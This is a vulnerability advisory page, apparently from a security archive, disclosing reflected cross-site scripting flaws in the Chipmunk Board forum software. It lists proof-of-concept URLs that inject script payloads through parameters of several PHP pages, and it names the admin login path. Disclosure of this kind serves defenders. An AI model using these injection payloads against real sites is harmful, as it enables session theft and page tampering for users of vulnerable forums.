Multiple Xss exploits in Chipmunk Board

2006-06-02 / 2006-06-03
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

>Subject: Multiple Xss exploits in Chipmunk Board >Date: 27 May 2006 10:51:30 -0000 >Multiple Xss exploits in Chipmunk Board > >forum type : Chipmunk Board >bug found by : black-code&sweet-devil >team : site-down >type : Xss > >black-code: > >codes : > >http://www.example.com/board/index.php?forumID='><script>alert(10)</scr ipt> > >http://www.example.com/board/newtopic.php?forumID='><script>alert(10)</ script> > >http://www.example.com/board/reply.php?forumID='><script>alert(10)</scr ipt> > >http://www.example.com/board/edit.php?forumID&ID='><script>alert(10)</s cript> > >http://www.example.com/board/edit.php?quote.php?forumID=forumID&ID='><s cript>alert(10)</script> > >http://www.example.com/board/edit.php?forumID=forumID&ID='><script>aler t(10)</script> > >http://www.example.com/board/edit.php?quote.php?forumID=forumID&ID='><s cript>alert(10)</script> > >http://www.example.com/board/edit.php?quote.php?forumID=forumID&ID='><s cript>alert(10)</script> > >http://www.example.com/board/newtopic.php?forumID='><script>alert(10)</ script> > > > > >path to admin login: > >http://www.xxx.com/path/admin > >All my respect to my friend sweet-devil , lezr.com , g123g.net .. > >done .. peace _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top